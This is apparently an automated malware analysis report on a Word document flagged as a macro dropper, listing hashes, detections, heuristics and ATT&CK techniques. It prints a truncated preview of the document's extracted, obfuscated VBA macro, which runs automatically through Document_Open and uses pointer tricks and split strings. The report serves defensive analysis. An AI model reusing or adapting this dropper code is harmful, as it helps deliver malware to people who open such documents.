Office (OLE) malware analysis — malicious · 24f45323facc3f2c

MALICIOUS

Office (OLE)

190.0 KB Created: 2017-02-08 12:36:00 Authoring application: Microsoft Office Word First seen: 2020-09-15

MD5: 0b3ac23b7ed91ac8554a5655ac63d42d SHA-1: f7829b32067f1cea46e1ade4b7f880e631ec6af3 SHA-256: 24f45323facc3f2c366e08e21870a8806ebb1579c23af86a356d67eb968e0ac0

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.ZwMacros-6057750-0, indicating it's a macro-based dropper. The presence of a Document_Open macro that executes a shell command strongly suggests the intent to download and execute a second-stage payload. While no specific family is identified, the macro's structure and execution method are characteristic of common malware droppers.

Heuristics 5

ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14114 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14114 bytes
SHA-256: `37cc1d57fe15463667f85d7f1ad26db408900891131f7a158166e4c58997601b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub max() With Documents("Example.doc").Windows(1) If .WindowState = wdWindowStateMinimize Then _ .WindowState = wdWindowStateMaximize End With End Sub Function thiobacillus(classifiable, metabolite, ballista) #If Win64 Then Dim cathectic As Byte Dim milkwhite As String Dim shortbread As LongPtr Dim cheerleader As LongPtr Dim aspen As LongPtr Dim boggle As Long Dim cajolery As LongPtr Dim notissima As LongPtr #Else Dim cheerleader As Long Dim agnostic As Integer Dim shortbread As Long Dim algal As String Dim cajolery As Long Dim obscurius As Variant Dim aspen As Long Dim condensing As String Dim notissima As Long Dim fabula As Integer Dim digitate As Variant #End If coexistence = founders - 283 bogeyman = masturbator cheerleader = classifiable notissima = ballista masturbator = masturbator cajolery = metabolite corpus = 3 symmetrically = 396 moonfish = 14419 refute = 228296 refute = SYD(refute, moonfish, symmetrically, corpus) bogeyman = "intralinguistic" shortbread = 91 - 36 - 56 bevy ByVal shortbread, cheerleader, cajolery, notissima, aspen bogeyman = "vortex" End Function Private Sub Document_Open() Dim backgeared As Variant Dim pause As Long crescent = "def" & "ection" cresol = "artiste" altimeter beady = 55 infantine = 36330 arthrosporic = 369577 infantine = Pmt(0.0751, beady, -19808, arthrosporic, 0) End Sub Function adore(pandurate) Dim prunello As Integer Dim crackle As Variant Dim condor As Variant Dim chaque As Long #If Win64 Then Dim gadget As String Dim onside As LongPtr rotgut = 53 - 49 + 4 Dim backmost As LongPtr Dim decuration As String Dim contrate As String Dim cringe As LongPtr Dim medallist As String #Else Dim theatric As Byte Dim onside As Long rotgut = 98 - 56 - 117 + 79 Dim backmost As Long Dim gromwell As Integer Dim cringe As Long Dim emancipated As Long Dim cassareep As Long #End If baas = thiobacillus(VarPtr(onside), VarPtr(pandurate) + 8, rotgut) excellent = 54 - 18 + 31 - 68 backmost = 127 + 3 - 10 - 120 megapodius = 0 cringe = 9442 african = 82 - 8 + 4022 dropseed = 64 rice = charlatism(ByVal excellent, backmost, ByVal megapodius, cringe, ByVal african, ByVal dropseed) masturbator = bogeyman masturbator = "tet" thiobacillus backmost, onside, 74 + 76 + 4234 gunboat = 28 clavier = 26179 privative = 561899 clavier = Pmt(0.0347, gunboat, -17383, privative, 1) adore = backmost End Function Sub altimeter() Dim actinomeris As Variant Dim almightiness As Byte blain = ThisDocument.ComputeStatistics(wdStatisticPages) unestablished.durance.Value = blain + 9 neuroglial = "unsated" innovation = "foretopsail" Set photoemission = unestablished.durance.SelectedItem everywhere = 33 biolets = 6195 coccoidea = 461786 biolets = Pmt(0.063, everywhere, -35290, coccoidea, 1) heme = photoemission.Name cognoscence = 66 + 5778 donec = Right(heme, cognoscence) exchange = overreaction.mercaptopurine(donec) mamma = 7 hangdog = 382 burial = 29032 glossary = 187036 glossary = SYD(glossary, burial, hangdog, mamma) expressed = "casuss" bacillariophyceae = "anomalousness" #If Win64 Then Dim beggarwoman As Long Dim breathlessly As LongPtr Dim nonincrease As LongPtr Dim belonging As Byte #Else Dim colinus As Integer Dim nonincrease As Long Dim cleveland As Integer Dim breathlessly As Long #End If thermograph = 0 pinscher = "goshawk" membership = 4096 chut = 2 whilom = 276 irrevocable = 11626 ambiloquy = 481790 ambiloquy = SYD(ambiloquy, irrevocable, whilom, chut) simmer = "mu" & "s" atonalistic = "acrobat" dolour = 89 unbalconied = 39447 nonverbally = 271890 unbalconied = Pmt(0.072, dolour, -3369, nonverbally, 0) cadeau = exchange privity = "antiredeposition" ... (truncated)

SHA-256: 37cc1d57fe15463667f85d7f1ad26db408900891131f7a158166e4c58997601b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub max()
    With Documents("Example.doc").Windows(1)
        If .WindowState = wdWindowStateMinimize Then _
            .WindowState = wdWindowStateMaximize
    End With
End Sub

Function thiobacillus(classifiable, metabolite, ballista)
#If Win64 Then
Dim cathectic As Byte
Dim milkwhite As String
Dim shortbread As LongPtr
Dim cheerleader As LongPtr
Dim aspen As LongPtr
Dim boggle As Long
Dim cajolery As LongPtr
Dim notissima As LongPtr
#Else
Dim cheerleader As Long
Dim agnostic As Integer
Dim shortbread As Long
Dim algal As String
Dim cajolery As Long
Dim obscurius As Variant
Dim aspen As Long
Dim condensing As String
Dim notissima As Long
Dim fabula As Integer
Dim digitate As Variant
#End If
coexistence = founders - 283
bogeyman = masturbator
cheerleader = classifiable
notissima = ballista
masturbator = masturbator
cajolery = metabolite
corpus = 3
symmetrically = 396
moonfish = 14419
refute = 228296
refute = SYD(refute, moonfish, symmetrically, corpus)

bogeyman = "intralinguistic"
shortbread = 91 - 36 - 56
bevy ByVal shortbread, cheerleader, cajolery, notissima, aspen
bogeyman = "vortex"
End Function
Private Sub Document_Open()
Dim backgeared As Variant
Dim pause As Long
crescent = "def" & "ection"
cresol = "artiste"
altimeter
beady = 55
infantine = 36330
arthrosporic = 369577
infantine = Pmt(0.0751, beady, -19808, arthrosporic, 0)
End Sub
Function adore(pandurate)
Dim prunello As Integer
Dim crackle As Variant
Dim condor As Variant
Dim chaque As Long
#If Win64 Then
Dim gadget As String
Dim onside As LongPtr
rotgut = 53 - 49 + 4
Dim backmost As LongPtr
Dim decuration As String
Dim contrate As String
Dim cringe As LongPtr
Dim medallist As String
#Else
Dim theatric As Byte
Dim onside As Long
rotgut = 98 - 56 - 117 + 79
Dim backmost As Long
Dim gromwell As Integer
Dim cringe As Long
Dim emancipated As Long
Dim cassareep As Long
#End If
baas = thiobacillus(VarPtr(onside), VarPtr(pandurate) + 8, rotgut)
excellent = 54 - 18 + 31 - 68
backmost = 127 + 3 - 10 - 120
megapodius = 0
cringe = 9442
african = 82 - 8 + 4022
dropseed = 64
rice = charlatism(ByVal excellent, backmost, ByVal megapodius, cringe, ByVal african, ByVal dropseed)
masturbator = bogeyman

masturbator = "tet"

thiobacillus backmost, onside, 74 + 76 + 4234
gunboat = 28
clavier = 26179
privative = 561899
clavier = Pmt(0.0347, gunboat, -17383, privative, 1)

adore = backmost
End Function
Sub altimeter()
Dim actinomeris As Variant
Dim almightiness As Byte
blain = ThisDocument.ComputeStatistics(wdStatisticPages)
unestablished.durance.Value = blain + 9
neuroglial = "unsated"
innovation = "foretopsail"
Set photoemission = unestablished.durance.SelectedItem
everywhere = 33
biolets = 6195
coccoidea = 461786
biolets = Pmt(0.063, everywhere, -35290, coccoidea, 1)

heme = photoemission.Name
cognoscence = 66 + 5778
donec = Right(heme, cognoscence)
exchange = overreaction.mercaptopurine(donec)
mamma = 7
hangdog = 382
burial = 29032
glossary = 187036
glossary = SYD(glossary, burial, hangdog, mamma)

expressed = "casuss"
bacillariophyceae = "anomalousness"
#If Win64 Then
Dim beggarwoman As Long
Dim breathlessly As LongPtr
Dim nonincrease As LongPtr
Dim belonging As Byte
#Else
Dim colinus As Integer
Dim nonincrease As Long
Dim cleveland As Integer
Dim breathlessly As Long
#End If
thermograph = 0
pinscher = "goshawk"
membership = 4096
chut = 2
whilom = 276
irrevocable = 11626
ambiloquy = 481790
ambiloquy = SYD(ambiloquy, irrevocable, whilom, chut)

simmer = "mu" & "s"
atonalistic = "acrobat"
dolour = 89
unbalconied = 39447
nonverbally = 271890
unbalconied = Pmt(0.072, dolour, -3369, nonverbally, 0)

cadeau = exchange
privity = "antiredeposition"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.